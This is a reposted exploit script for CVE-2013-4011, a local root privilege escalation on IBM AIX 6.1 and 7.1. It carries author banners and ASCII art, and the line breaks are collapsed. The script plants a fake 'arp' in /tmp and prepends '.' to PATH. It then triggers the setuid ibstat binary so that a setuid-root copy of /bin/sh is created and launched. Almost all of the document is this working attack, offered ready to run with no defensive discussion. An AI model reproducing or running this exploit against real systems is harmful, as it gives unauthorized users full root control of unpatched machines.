[local] - IBM AIX 6.1 / 7.1 - Local root Privilege Escalation

#!/bin/sh# Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation# Date: 2013-09-24# Exploit Author: Kristian Erik Hermansen # Vendor Homepage: http://www.ibm.com# Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html# Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02# Tested on: IBM AIX 6.1# CVE: CVE-2013-4011echo ' mm mmmmm m m ## # # # # # # ## #mm# # m""m # # mm#mm m" "m'echo "[*] AIX root privilege escalation"echo "[*] Kristian Erik Hermansen"echo "[*] https://linkedin.com/in/kristianhermansen"echo "+++++?????????????~.:,.:+???????????+++++++++???????????+...:.,.,.=??????????++++++???????????~.,:~=~:::..,.~?????????+++++???????????:,~==++++==~,,.?????????+++++???????????,:=+++++++=~:,,~????????++++++?????????+,~~=++++++=~:,,:????????+++++++????????~,~===~=+~,,::,:+???????+++++++++???????=~===++~~~+,,~::???????++++++++++++?????=~=+++~~~:++=~:~+???++++++++++++++++????~~=+++~+=~===~~:+??+++++++++++++++++?????~~=====~~==~:,:?++++++++++++++++++++????+~==:::::=~:,+??++++++++++++++++++++?????:~~=~~~~~::,??+++++++++++++++++++++?????=~:~===~,,,????++++++++++++++++++++???+:==~:,,.:~~..+??+++++++++++++++++++++....==+===~~=~,...=?+++++++++++++++++,........~=====..........++++++++++++................................++==+:....................................="TMPDIR=/tmpTAINT=${TMPDIR}/arpRSHELL=${TMPDIR}/r00t-shcat > ${TAINT} <<-!#!/bin/shcp /bin/sh ${RSHELL}chown root ${RSHELL} chmod 4555 ${RSHELL}!chmod 755 ${TAINT}PATH=.:${PATH}export PATHcd ${TMPDIR}/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/nullif [ -e ${RSHELL} ]; then echo "[+] Access granted. Don't be evil..." ${RSHELL}else echo "[-] Exploit failed. Try some 0day instead..."fi

View the original article here